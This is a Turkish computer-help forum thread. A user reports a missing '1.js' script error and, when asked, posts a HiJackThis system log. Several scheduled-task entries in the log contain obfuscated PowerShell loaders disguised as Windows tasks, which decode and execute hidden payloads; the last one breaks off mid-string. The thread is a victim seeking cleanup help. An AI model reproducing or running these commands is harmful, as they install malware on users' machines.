"ProgramData\Windows\Profile\1.js komut dosyası bulunamıyor" hatası

aliefe33b

Centipat
Katılım
29 Mayıs 2020
Mesajlar
26
Yer
Mersin
Merhabalar. Böyle bir hata alıyorum. McAfee antivirüs programında Whitelist'e de aldım ama olmuyor.
Yardımcı olursanız sevinirim.

1642927151592.png
 
Son düzenleyen: Moderatör:

acv

Megapat
Katılım
31 Temmuz 2015
Mesajlar
7.623
Makaleler
1
Çözümler
72
Yer
Sehit Muhtar/Zambak Sok./Gumus Gerdan Apt./Beyoglu
Whitelist'e eklediklerinizi çıkarıp aşağıdaki raporu paylaşın.

 
KS
KS
aliefe33b

aliefe33b

Centipat
Katılım
29 Mayıs 2020
Mesajlar
26
Yer
Mersin
Whitelist'e eklediklerinizi çıkarıp aşağıdaki raporu paylaşın.

Kod:
Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.16
Logfile of HiJackThis Fork by Alex Dragokas v.2.10.0.16

Platform:  x64 Windows 10 (Home Single Language), 10.0.19044.1499 (ReleaseId: 2009, 21H2), Service Pack: 0
Time:      23.01.2022 - 13:21 (UTC+03:00)
Language:  OS: Turkish (0x41F). Display: Turkish (0x41F). Non-Unicode: Turkish (0x41F)
Elevated:  Yes
Ran by:    CASPER    (group: Administrators) on CASPERNIRVANA, FirstRun: yes

Chrome:  97.0.4692.71
Internet Explorer: 11.0.19041.1202
Default: "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --single-argument %1 (Google Chrome)

Boot mode: Normal

Running processes:
Number | Path
   1  C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe
   1  C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
   1  C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
   1  C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler.exe
   1  C:\Program Files (x86)\Google\Update\1.3.36.122\GoogleCrashHandler64.exe
   1  C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAService.exe
   1  C:\Program Files (x86)\Intel\Driver and Support Assistant\DSATray.exe
   1  C:\Program Files (x86)\Intel\Driver and Support Assistant\DSAUpdateService.exe
   1  C:\Program Files (x86)\Sony\PlayMemories Home\PMBDeviceInfoProvider.exe
   1  C:\Program Files (x86)\Steam\steam.exe
   1  C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
   1  C:\Program Files\Common Files\McAfee\CSP\4.3.107.0\McCSPServiceHost.exe
   1  C:\Program Files\Common Files\McAfee\MMSSHost\MMSSHOST.exe
   3  C:\Program Files\Common Files\McAfee\ModuleCore\ModuleCoreService.exe
   1  C:\Program Files\Common Files\McAfee\ModuleCore\ProtectedModuleHost.exe
   1  C:\Program Files\Common Files\McAfee\PEF\CORE\PEFService.exe
   1  C:\Program Files\Common Files\McAfee\Platform\McUICnt.exe
   1  C:\Program Files\Common Files\McAfee\SystemCore\mfemms.exe
   1  C:\Program Files\Common Files\McAfee\VSCore_21_4\mcapexe.exe
   1  C:\Program Files\Dolby\Dolby DAX2\DAX2_API\DolbyDAX2API.exe
   1  C:\Program Files\Elantech\ETDCtrl.exe
   1  C:\Program Files\Elantech\ETDCtrlHelper.exe
   1  C:\Program Files\Elantech\ETDService.exe
   1  C:\Program Files\Intel\SUR\QUEENCREEK\Updater\bin\IntelSoftwareAssetManagerService.exe
   1  C:\Program Files\McAfee\MfeAV\MfeAVSvc.exe
   1  C:\Program Files\McAfee\WebAdvisor\servicehost.exe
   1  C:\Program Files\McAfee\WebAdvisor\uihost.exe
   1  C:\Program Files\Riot Vanguard\vgtray.exe
   1  C:\Program Files\SteelSeries\GG\moments\SteelSeriesSvcLauncher.exe
   1  C:\Program Files\SteelSeries\GG\SteelSeriesEngine.exe
   1  C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe
   1  C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservices.exe
   1  C:\Program Files\WindowsApps\Microsoft.GamingServices_3.60.12001.0_x64__8wekyb3d8bbwe\gamingservicesnet.exe
   1  C:\Program Files\Xear Audio Center\CPL\FaceLift_x64.exe
   2  C:\Users\CASPER\AppData\Local\Programs\Opera GX\launcher.exe
   1  C:\Users\CASPER\Desktop\HiJackThis.exe
   1  C:\Windows\explorer.exe
   1  C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
   1  C:\Windows\System32\audiodg.exe
   1  C:\Windows\System32\backgroundTaskHost.exe
   4  C:\Windows\System32\conhost.exe
   2  C:\Windows\System32\csrss.exe
   1  C:\Windows\System32\ctfmon.exe
   1  C:\Windows\System32\dasHost.exe
   1  C:\Windows\System32\dwm.exe
   2  C:\Windows\System32\fontdrvhost.exe
   1  C:\Windows\System32\igfxCUIService.exe
   1  C:\Windows\System32\igfxHK.exe
   1  C:\Windows\System32\lsass.exe
   1  C:\Windows\System32\mfevtps.exe
   1  C:\Windows\System32\MusNotification.exe
   2  C:\Windows\System32\RuntimeBroker.exe
   1  C:\Windows\System32\SearchFilterHost.exe
   1  C:\Windows\System32\SearchIndexer.exe
   1  C:\Windows\System32\SearchProtocolHost.exe
   1  C:\Windows\System32\SecurityHealthService.exe
   1  C:\Windows\System32\services.exe
   1  C:\Windows\System32\SettingSyncHost.exe
   1  C:\Windows\System32\SgrmBroker.exe
   1  C:\Windows\System32\sihost.exe
   1  C:\Windows\System32\smss.exe
   1  C:\Windows\System32\snmp.exe
   1  C:\Windows\System32\spoolsv.exe
  82  C:\Windows\System32\svchost.exe
   1  C:\Windows\System32\taskhostw.exe
   1  C:\Windows\System32\wbem\unsecapp.exe
   1  C:\Windows\System32\wbem\WmiPrvSE.exe
   1  C:\Windows\System32\wermgr.exe
   2  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   1  C:\Windows\System32\wininit.exe
   1  C:\Windows\System32\winlogon.exe
   1  C:\Windows\System32\WUDFHost.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
   1  C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
   1  C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe

R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [SuggestionsURL_JSON] = https://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part={searchTerms}&clid=2233630 - Yandex
R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{8C3078A0-9AAB-4371-85D1-656CA8E46EE8}: [URL] = https://yandex.com.tr/search/?text={searchTerms}&clid=2233630 - Yandex
O2 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre1.8.0_271\bin\jp2ssv.dll
O2 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.8.0_271\bin\ssv.dll
O2 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre1.8.0_271\bin\jp2ssv.dll
O2-32 - HKLM\..\BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre1.8.0_271\bin\ssv.dll
O2-32 - HKLM\..\BHO: McAfee WebAdvisor - {B164E929-A1B6-4A06-B104-2CD0E90A88FF} - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O4 - HKCU\..\Run: [Steam] = C:\Program Files (x86)\Steam\steam.exe -silent
O4 - HKCU\..\StartupApproved\Run: [com.blitz.app] = C:\Users\CASPER\AppData\Local\Programs\Blitz\Blitz.exe --autostart (2021/07/22)
O4 - HKCU\..\StartupApproved\Run: [DSL Host] = C:\Users\CASPER\AppData\Roaming\4C9F9BE4-4E44-4309-A6B4-69A5DA3242B1\DSL Host\dslhost.exe (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [OneDrive] = C:\Users\CASPER\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background (2021/07/22)
O4 - HKCU\..\StartupApproved\Run: [Opera GX Browser Assistant] = C:\Users\CASPER\AppData\Local\Programs\Opera GX\assistant\browser_assistant.exe (2021/03/09)
O4 - HKCU\..\StartupApproved\Run: [Spotify] = C:\Users\CASPER\AppData\Roaming\Spotify\Spotify.exe --autostart --minimized (2020/06/01)
O4 - HKCU\..\StartupApproved\Run: [Voicemod] = C:\Program Files\Voicemod Desktop\VoicemodDesktop.exe (file missing) (2020/11/25)
O4 - HKCU\..\StartupApproved\Run: [Zoom] = (no file) (2021/03/12)
O4 - HKCU\..\StartupApproved\StartupFolder: C:\Users\CASPER\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\NimoLive.lnk    ->    C:\Program Files (x86)\NimoLive\launcher.exe (2021/10/03)
O4 - HKLM\..\Run: [Cm108BSound] = C:\Program Files\Xear Audio Center\CPL\FaceLift_x64.exe /h /d
O4 - HKLM\..\Run: [Riot Vanguard] = C:\Program Files\Riot Vanguard\vgtray.exe
O4 - HKLM\..\Run: [SteelSeriesGG] = C:\Program Files\SteelSeries\GG\SteelSeriesGG.exe -dataPath="C:\ProgramData\SteelSeries\GG" -dbEnv=production -auto=true
O4 - HKLM\..\StartupApproved\Run: [AdobeGCInvoker-1.0] = C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe (2020/09/29)
O4 - HKLM\..\StartupApproved\Run: [AvastUI.exe] = C:\Program Files\Avast Software\Avast\AvLaunch.exe /gui (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run: [ETDCtrl] = C:\Program Files\Elantech\ETDCtrl.exe (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [RtHDVBg_Dolby] = C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe /FORPCEE4 (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [RTHDVCPL] = C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe -s (2021/09/25)
O4 - HKLM\..\StartupApproved\Run: [tvncontrol] = C:\Program Files\TightVNC\tvnserver.exe -controlservice -slave (file missing) (2020/11/30)
O4 - HKLM\..\StartupApproved\Run: [Wondershare Helper Compact.exe] = C:\Program Files\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/09/29)
O4 - HKLM\..\StartupApproved\Run32: [DivXMediaServer] = C:\Program Files (x86)\DivX\DivX Media Server\DivXMediaServer.exe (file missing) (2020/10/27)
O4 - HKLM\..\StartupApproved\Run32: [Intel Driver & Support Assistant] = C:\Program Files (x86)\Intel\Driver and Support Assistant\DSATray.exe (2021/12/22)
O4 - HKLM\..\StartupApproved\Run32: [PMBVolumeWatcher] = C:\Program Files (x86)\Sony\PlayMemories Home\PMBVolumeWatcher.exe /SysAutoRun (2021/03/09)
O4 - HKLM\..\StartupApproved\Run32: [SunJavaUpdateSched] = C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe (2021/03/12)
O4 - HKLM\..\StartupApproved\Run32: [Wondershare Helper Compact.exe] = C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe (file missing) (2020/11/09)
O4 - HKU\S-1-5-19\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Local service')
O4 - HKU\S-1-5-20\..\RunOnce: [WAB Migrate] = C:\Program Files\Windows Mail\wab.exe /Upgrade (User 'Network service')
O9 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\x64\IEPlugin.dll
O9-32 - Button: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O9-32 - Tools menu item: HKLM\..\{48A61126-9A19-4C50-A214-FF08CB94995C}: McAfee WebAdvisor - C:\Program Files\McAfee\WebAdvisor\win32\IEPlugin.dll
O17 - DHCP DNS 1: 192.168.1.1
O18 - HKLM\Software\Classes\Protocols\Filter\application/x-mfe-ipt: [CLSID] = {3EF5086B-5478-4598-A054-786C45D75692} - C:\Program Files\McAfee\MSC\McSnIePl64.dll
O21 - HKLM\..\ShellIconOverlayIdentifiers\00asw: (no name) - {472083B0-C522-11CF-8763-00608CC02F24} - (no file)
O22 - Task (.job): (disabled) (Not scheduled) CreateExplorerShellUnelevatedTask.job - C:\WINDOWS\explorer.exe
O22 - Task: (activation) \Microsoft\Windows\Windows Activation Technologies\Windows Activation Technologies - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "$vKuBCo='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';$qlygJ='nTevQxrioBYX';$fLUN=($qlygJ[7]+$qlygJ[2]+$qlygJ[5]);&$fLUN(&$fLUN ('''[Telvqxt.Encolvqding]::UTlvqF''+2*2*2+''.GelvqtStlvqring([Conlvqvert]::Fro''+''mlvqB''+''ase''+8*8+''Strilvqng(([relvqgex]:lvq:Malvqtchlvqes(''''pkCb3R0bXRFJocmbxZHbpJXc2xGdTRXZxZHbH5COGFndsRVV6oTXn5WaxZHbk92YxZHbuVkL0hXc2xWZU5SblRXc2x2c5FndsN1WogXc2xWZxZHbptTKyVmYxZHbtVnbsFndsFWayV2Uuclb1ZXRi9GJrcCInsCblRWc2x2bN5yVuVndFJ2bkgCIpkybDJUdLZHJocmbpJHdxZHbTRTc2xmNlNXYxZHbC12bxZHbyZkO60FdyVmdxZHbu92Qu0WZ0FndsNXeTtFKgMWc2xWZk1Db3R0bXRFJ7IXZi1Wc2xWduxWYpFndsJXZTxCblFndsR2bNBCdjVWc2xGblNHf9dCMFZVSSRETBFndsNUSTlFSQxlLcx1JgEXZtACRJVWc2x2YpZXZE5yXksHIlJXc2xWZodHflZXaxZHbyR2axZHbzlGZfJzMxZHbulWc2x2dgkWbxZHb3dWPX5Wd2VkYvRSf7kERLZ0QkAibyFndsVHdlJXfrsyVuVndFRyOORXbmRCIy9Gei1CIddlb1ZXRksVdFBlVkAicvFndshnYtASX1hFRVJFUksVSEtkRDRSPdVHWEVlUQRyWJR0SGNEJ74EdtZGJgI3bxZHb4JWLgkiM1EDIy9mYtAiT01mZkACZuFndsFmYtAyMygSPORXbmRSfw0zVuVndFRyepQnb192QuUXRQZFJgU2ZtAyVuVndFRCKml2epsyK1hFRVJFUksDduV3bD5SSEtkRDRCI0xWLgUHWEVlUQRyOw0TdYRUVSBFJoI3bxZHbmtDM9clb1ZXRksTXwsVdFBlVk0jT01mZksTKSlVWX5kekgyclFndsRXeCRXc2xWZH5COGRVV6oTXn5Wc2xWak92YuVkL0FndshXZU5SblFndsR3c5N1W9UXRQZFJ7liUZl1VOpHJddmbpJXc2xGdztFLJR0SGNEJd11WlRXc2xWeitFKjVWc2xGZg42bpR3YxZHbuVnZ'''',''''.'''',''''RilvqghlvqtTlvqoLlvqeft'''')|FolvqrEalvqch {$lvq_lvq.vallvque}) -jlvqo''+''in ''''''''))-replvqlace''''llvqvq''''|&(''''ilvqelvqx'''');''-'+'rep'+'lace''lvq'''))"
O22 - Task: (damaged) HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\NCH Software (empty)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_AC - C:\WINDOWS\system32\MusNotification.exe /RunOnAC EngagedRebootReminder (Microsoft)
O22 - Task: (disabled) (update) \Microsoft\Windows\UpdateOrchestrator\Reboot_Battery - C:\WINDOWS\system32\MusNotification.exe /RunOnBattery EngagedRebootReminder (Microsoft)
O22 - Task: (disabled) \Agent Activation Runtime\S-1-5-21-523137893-4004670275-4196358549-1001 - C:\WINDOWS\System32\AgentActivationRuntimeStarter.exe
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\Retry - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ProvRetryTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\Management\Provisioning\RunOnReboot - C:\WINDOWS\system32\ProvTool.exe /turn 5 /source ContinueSessionTask (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work - C:\WINDOWS\system32\usoclient.exe StartMaintenanceWork (Microsoft)
O22 - Task: (disabled) \Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work - C:\WINDOWS\system32\usoclient.exe StartWork (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\Office 15 Subscription Heartbeat - C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe (file missing)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentFallBack2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload mininterval:2880 (Microsoft)
O22 - Task: (telemetry) \Microsoft\Office\OfficeTelemetryAgentLogOn2016 - C:\Program Files\Microsoft Office\Office16\msoia.exe scan upload (Microsoft)
O22 - Task: (telemetry) \Microsoft\Windows\Application Experience\PcaPatchDbTask - C:\WINDOWS\system32\rundll32.exe C:\WINDOWS\system32\PcaSvc.dll,PcaPatchSdbTask (Microsoft)
O22 - Task: \Avast Software\Overseer - C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe /from_scheduler:1 (file missing)
O22 - Task: \McAfee\DAD.Execute.Updates - C:\Program Files\Common Files\McAfee\DynamicAppDownloader\1.6.110\DADUpdater.exe
O22 - Task: \McAfee\McAfee Auto Maintenance Task Agent - {ABCECA3B-EA5A-496B-A021-5C6BAB365E5C} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \McAfee\McAfee DAT Built in test - C:\Program Files\Common Files\McAfee\AMContent\scanners\x86_64\datrep\1.0.12.663\mcdatrep.exe /hcmode=periodic /periodicruncount=5
O22 - Task: \McAfee\McAfee Idle Detection Task - {ABCDCA3B-DE6B-5A7C-B132-6D7CBA63E5C5} - C:\Program Files\Common Files\McAfee\TaskScheduler\McAMTaskAgent.exe
O22 - Task: \Microsoft\Windows\Maintenance\WinNAT - C:\ProgramData\Windows\Profile\1.js powershell -c "984122374;$DxF='QCNyeyJxqkjQiV';'}&(5gc_m bA*y-T8y*_).bNaqme4 (0''i.us0?i{n9_g 2hS_y7ust_ie_mgc;u7_s+i_5ngp+ _S8,ysy,t_e_dm.8iI6O!+;u+_s_i{]ng_8 iS_lys2_t0e6cm.q5R2uj)nti_i_m_6e.b!I]nr0te_2r7o_{pS4meir_,vi62c7e_=s;ayugsvdin2{gn {bMiwfc_rf0os_7o_f9xt.jhW5ia=n35_2+;s9pu-xbilq_ic_r ?ct_lay=sxszv T3sB3{n_dev6l0e1cga_)t_e8b vhmoti_xd -ic]E5,iv=/(_)cs;p[bu6b]1li86c0 gsst_va(treici_ =v55oi1_d_ 0_cj3qouEk_()y_{/bd5yt3?ek[_4]M{wm_E_zb=_[F{ig_les+./E9-xiigsat77s(9_WrU_djhb_yat1xvrt4v_r_gWU.o)!?z-Fi-klneb6.R!_e2a_odAkblelz_By-+tae_fs(3gW(U_njh)rywtdsvr_(vdrtxWUec)5:)_(blpy_t_te[c_]2)_oRe{2gsi21sttdr_y!k.Luto_craalxtMfa_/ch=fitnf-e.}_O0p8_endnS=u3_bKz{e4ym{(@x3WlU__SO_lF)TlrWA_3RuE8-\M/_i_c0.ro--suo6!ft-9\4Ch_TF.0\-Tl_IP_5W_Uy()._tGhe!stV5sa)l_3ueb4(_WzaUj_ih7yd!tv_{r1vg4rW=+U!,_)nu_el5lp/);b}isf_o(M}-m[E(tb=oq={n6+ul85l])_jrew7t(ui(rn_0;cis_nt4- 9y__Zg,_u_=m_MmtfE,b?u.L1_ebnq=gtlahi;={fo!ur_(__ink7tc 54lXywB[=_r0;__l_XreB ]_!y=_7yZ0_g_uus-13.;alw_XB_j+++ia){__M5m9_Eb,c[.l{0XB_)]_^_(=(_kb_y_tte_w)_Wk_U+i}P_V__xnzpU{c_1}4f){xUmo9id.I_U.+NK_p4+gtx8oiu7[]1v4p+2Xe/_!KWmaU.[_!lXn_Bpfk_K21w86]{w;}k{I_np1tP_6t_roz mn(gwy_sk=cj(yI}]nt.8P/tn}r)e80_;[dIn_{t_Phbtrb_ be77Jv4a=7(oqIn_0tkP9_trc1)_y0_Zglouw;-_NtmoA8lt_lo5vc_a4ste_7V=i/_rt6?u_a{qlM7_ewmy_orq_y{(dj(I6znqt[4Pt)4rs)cn(-,v13)0s,rvsedf+_ melgky_tk,aq(oIs_nt_sPht7ur)/f0l,irregzf4 34eJb_vq,k,0xu}1a07=00m[,[0d0x4b103)gk;Mi_a_rv_sha_a6lqr.C_4o_pt,y(9oMsm_9Eb}},20v_,moagoy2!k,_[y.Z9+gu8h)r;e[((+_c!Eraiv9h)lM!rar(5s)hvpal.u._Gl,et_9D?e8_leorg9a0qteqnF)oq)rF2_uon9yct3bi_o}mnP_4o_iv_nt_(e.r01(ml{gmy7lk,r/t6y8.pe=.otf?=(c01E9i+4v)y()h)_/()_];(}t_[D7_l_l,{Im03pfo9drt!=(eW[(Unwmt[dt/llh_WsU+_)]7.pxr_jivk5a_t-_e cfs6ti_at_/i4c_3 e[+xot7serjxn9 2uloionvg5k Ni_thA__ll=oopc_satriezV6=irn!t_u[_al5gM/e_kmot(r[y+v(I=anftrhPt__r} hwVttn,.rp3ef[1 zI__nt[1Prt.-r _7e_OwfCQ_],(I,gnt6iP]toer _xwet_,m,oer_e5wf a4I2njjtP7_t_rb5 V/]atC2c,U6bIyn/wt3hv2? zoZw3),?U?7In_)t23g!2 v8U_pv));9=}_ '']-r_ep0la_ce(''._(.i.)-'',/''$?1''_ -tre_pl5ac(e''rWUi'',)[c_ha6r]c(3_4)k -_rekplzac+e''dfK6'',l[c(ha]r]x(3?7)h);6[Exnveiroonamenntf]:3:Couryrernt!Di{remctbor_y=3pw}d;][TwB]k::ycjgoEy()-; '-replace('.qnIU(qnIU.qnIU.)'-replace'qnIU'),('$'+807/807)|&($DxF[12]+$DxF[4]+$DxF[7]);3684975378" (file missing)
O22 - Task: \Microsoft\Windows\MUI\578309983 - C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -c "2268987711;$WTPb='NnkreMT)ixg.nO(llAikcJ';$rep_var='b&(pgc_m kA*g-Try*b)._Na.mex ({''k_us-_i_nekg m6Suyo2stc_edm?_;u8_smio_ngvz bSr.ysw0teeu+m._0I1O2_;u_9s-ifyng_4 _Smoys_7tle=im.e)R(uw_ntymijm_fe./!Inn_ute_?ryo_fpSk5eprz2vi}tcme{2s;}2u5s{?in_jg/ zpMivzcdr?_osc_o_f}1t.t2Wli_kn3lz2_;0_puh.b+l_8ic__ 2chcla_3syssy r{_c_Y+en{0)d_e]9le]_g8au(te7k jv__oi-+d_ 63WJ0.i.m_j()ov;rp-0ub1dl7iz_c _]s_t}katf7i_ci. vh9ooi4ld 8-B?I?rMT09(v)u[{b9_y,t]ie[5=]ujr,FP.ct_x_)=F_(ikleze.60Elx_vish)tns(1(u6lyrCf!rax0j8hm0yti6v-rf,vr?=u_ycvCr88ad)}k?F.li_lsle.h_Rue_xadw}A.lg)lBm7y)tdqes,_(su!fyCe_roap_jh!(yht_{vrycvtr=}uyt9C}r2.a)_(:_(8_bye2tve.m[]_j)oRe8egnni0s__tr_)y+._oLot.cpa5!lM_ba/c_3hii_nte__.O5_p_e4_nS+_u[bc_Ke3lyb([email protected]_xy{Cqyra]jSrO2_FTk-W4A_zREy9\(Makicvgr-o8_so_rf,tp=\C}9TuF_9\T3_I1P-muy_yC/r_4a)d}.]Gf_etj2V8a,plu__e{(y,uy-_C,r_sajb_h_yf,tv5_r_v_4ru-.ylC1oradp,_n}uul__ln)6_;i_-f_(f4jF![P0t/gx=_3=1n=8ul,-l_)29re-ltbu_urnh0;gi4_nteh hs_4JJmiKi=s{jFd_Petl_x._2Lpegyngu_t_h=p;f=bobr__(ie_nftm. vl_n?bijD=9l0j;_5vn=9b_Dsa !/e=8sj_JJ_{Kp-_81;]hv8nazbD.,+_+jw){12j_Fk-Pt7ixr[_?vn[!b?D_v]^g_=s(gibyott9ed9)ud9y=C_3raj_OuU}eM9_nQwvqmk/.qq/?_8!!gkB+(_jnw4_zlj26lG_p3d!_,pa3qQ+ujwyC/_r9a4a[v__ndb91DB3?noB)ogt}_2=5j]];+h}5I__ntp_P.tr_r h]i)f_brNp_=c(zvIni?tfP)7trml)_0__;I,onxtwgPt}_rc {mzctrsln_)f=3_(1Ie5nto_P)tv)r)f5s{J_}JK-r;_Nt0tA_nl_lgloc__alt_peV5-idr__tu,[a_l]hMe1_meo,_ry_[(x(9_In_6tgP7ztrx_)q(t,-1{g)_,tarekqf[ 